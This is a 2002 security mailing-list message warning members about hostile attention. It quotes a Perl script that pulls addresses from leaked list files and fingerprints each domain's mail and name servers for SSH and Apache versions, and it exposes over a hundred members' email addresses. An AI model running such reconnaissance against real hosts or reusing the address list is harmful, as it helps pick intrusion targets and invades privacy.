XXX Supplied by BIG GAY AL HUGER of #phrack XXX ------------------------------------- ----- Forwarded message from Dragos Ruiu ----- Delivered-To: xxxxxxxxxxxxxxxx From: Dragos Ruiu Organization: kyx.net To: dr@dursec.com, rongula31@hotmail.com, ken.williams@ey.com, roesch@sourcefire.com, fygrave@scorpions.net, vision@whitehats.com, rfp@wiretrip.net, aleph1@securityfocus.com, wooc@powersurfr.com, apr.inc@powersurfr.com, conroy.badger@powersurfr.com, crystal@positioning-research.com, jason.dorie@blackboxgames.com, darryl_turner@yahoo.com, mrandles@softhome.net, vizuelle@eudoramail.com, fyodor@insecure.org, spikeman@spikeman.net, lance@spitzner.net, listuser@seifried.org, mfranz@cisco.com, phillip.ibis@blackboxgames.com, cwallace@exceedia.com, priest@sfu.ca, hdm@digitaloffense.net, rhamel@kpmg.ca, nico@securite.org, kaneda@securite.org, dsward9s@pacbell.net, andy@dragonfly.demon.co.uk, ktwo@ktwo.ca, kinkster1@shaw.ca, ajarman@metacomcorp.com, zindelak@telusplanet.net, jeff@wwti.com, smkoen@hotmail.com, cwilson2@kpmg.ca, newspixie@hotmail.com, mock@obscurity.org, j@lords.com, ksoze@obscurity.org, frank@atstake.com, fishy@powersurfr.com, cakeislove@hotmail.com, tiffany_kary@zd.com, stephenn@powersurfr.com, webmaster@pneumafables.com, bsapiro@kpmg.ca, kmx@egatobas.org, hectorh@pobox.com, emmanuel@relaygroup.com, vanja@vanja.com, dje@bht.com, dugsong@monkey.org, lyndon@orthanc.ab.ca, mts@off.off.to, paudley@blackcat.ca, robert_david_graham@yahoo.com, spambait-kyx@inetgrity.com, chris@obscurity.org, peter_wong@pmc-sierra.com, janet@lomas.ab.ca, dfreelove@yottayotta.com, dowen@intravelnet.com, randlest@oanet.com, jay@bastille-linux.org, phil@ccc-ltd.com, jed@pickel.net, gshipley@neohapsis.com, deraison@cvs.nessus.org, maxx@securite.org, mixter@newyorkoffice.com, deraadt@cvs.openbsd.org, dittrich@cac.washington.edu, bgreenbaum@securityfocus.com, neil@bortnak.com, annemarie@counterpane.com, chris.kuethe@ualberta.ca, bob.beck@ualberta.ca, tan@atstake.com, natasha@snort.org, arr@watson.org, aempirei@ucla.edu, ggolomb@enterasys.com, jfrank@b-ap.com, robert@infoserf.net, kkuehl@cisco.com, donna.andert@sun.com, bmc@snort.org, jgary@clicktosecure.com, jpavlick@sourcefire.com, talisker@networkintrusion.co.uk, jwalchuc@enterasys.com, itay@imc.nl, halvar@blackhat.com, Sk!ppY@IdealRealms.com, forrest@code-lab.com, mconley@atstake.com, jennifer@granick.com, scott@microsoft.com, ah@securityfocus.com, cruci@hwa-security.net, solar@openwall.com, ivan.arce@corest.com, rlogan@camisade.com, cmg@uab.edu, jed@grep.net, v0nelm0@best.com, snorthcutt@hawaiian.net, frank@ccc.de, dmckay@microsoft.com, jwilkins@bitland.net, kf@gnosys.biz, unlearn@ne.mediaone.net, jpr5@darkridge.com, shok@dataforce.net, thegnome@nmrc.org, ofir@sys-security.com, provos@umich.edu, silvio@big.net.au, mike@infonexus.com, crispin@wirex.com, halfdead@digitalnerds.net, niness@devilness.org, curtis.king@messagingdirect.com, rob@incident-response.org Subject: kyxspam: kiddie games Date: Wed, 17 Jul 2002 12:27:05 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] (There is some small effort to find out where the kids are getting some kyx stuff from for their little games, but the url below should at least be a warning that you should check your servers, cause the kids seem to be spending an awful lot of time and energy on this list (must be nice). The below just looks like a way for some kids to get in trouble. But I agree with Greg, like what if no-one pays attention. Heh. BTW please make sure to use the new to line. It's important that the address for halfdead be updated because Jim Jones has an account on phear.org. Speaking of jj :-), GOBBLES emailed to make sure that I know that the turkeys and the el8 kids are not one and the same. Thanks... nice to know they care what I say. :-) The below should be a little warning that some people appear to have too much time on their hands and not a lot of wisdom. It just looks like a way for some kids to get in trouble. Ultimately, there seems to be a lot of anti-Honeynet (which for some reason they can't differentiate from this list) pent up rage in these little creatures... or is it fear that motivates? Caveat delivered... Also please as a convenience to readers prefix subject lines to list with a kyxspam: label. Thanks. p.s. Hi Max. cheers, --dr :-) url: http://www.eurocompton.net/~fuk/phrack/own-kyx.pl #!/usr/bin/perl # usage: own-kyx.pl narc1.txt # # this TEAM #PHRACK script will extract the email addresses # out of the narc*.txt files, enumerate the primary MX and NS # for each domain, and grab the SSHD and APACHE server version # from each of these hosts (if possible). # # For educational purposes only. Do not use. use IO::Socket; if ($#ARGV<0) {die "you didn't supply a filename\n";} $nrq =$ARGV[0]; $msearch = '([^":\s<>()/;]*@[^":\s<>()/;\.]*.[^":\s<>()/;]*)'; open (INF, "$nrq") or die $!; while(){ if (m,$msearch,ig){push(@targets, "$&");} } close INF; foreach $victim (@targets) { print "=====\t$victim \t=====\n"; my ($lusr, $domn) = split(/@/, $victim); $smtphost = `host -tMX $domn |cut -d\" \" -f7 | head -1`; $smtphost =~ s/[\r\n]+$//ge; print ":: Primary MX located at $smtphost\n"; sshcheq($smtphost); apachecheq($smtphost); $nshost = `host -tNS $domn |cut -d\" \" -f4 | head -1`; $nshost =~ s/[\r\n]+$//ge; sleep(3); print ":: Primary NS located at $nshost\n"; sshcheq($nshost); apachecheq($nshost); print "\n\n"; sleep(3); } sub sshcheq { (my $sshost) = @_; print ":: Testing $sshost for sshd version\n"; $g = inet_aton($sshost); my $prot = 22; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n"; if(connect(S,pack "SnA4x8",2,$prot,$g)) { my @in; select(S); $|=1; print "\n"; while(){ push @in, $_;} select(STDOUT); close(S); foreach $res (@in) { if ($res =~ /SSH/) { chomp $res; print ":: SSHD version - $res\n"; } } } else { return 0; } } sub apachecheq { (my $whost) = @_; print ":: Testing $whost for Apache version\n"; $g = inet_aton($whost); my $prot = 80; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n"; if(connect(S,pack "SnA4x8",2,$prot,$g)) { my @in; select(S); $|=1; print "HEAD / HTTP/1.0\r\n\r\n"; while(){ push @in, $_;} select(STDOUT); close(S); foreach $res (@in) { if ($res =~ /ache/) { chomp $res; print ":: HTTPD version - $res\n"; } } } else { return 0; } } --kyx-- ----- End forwarded message -----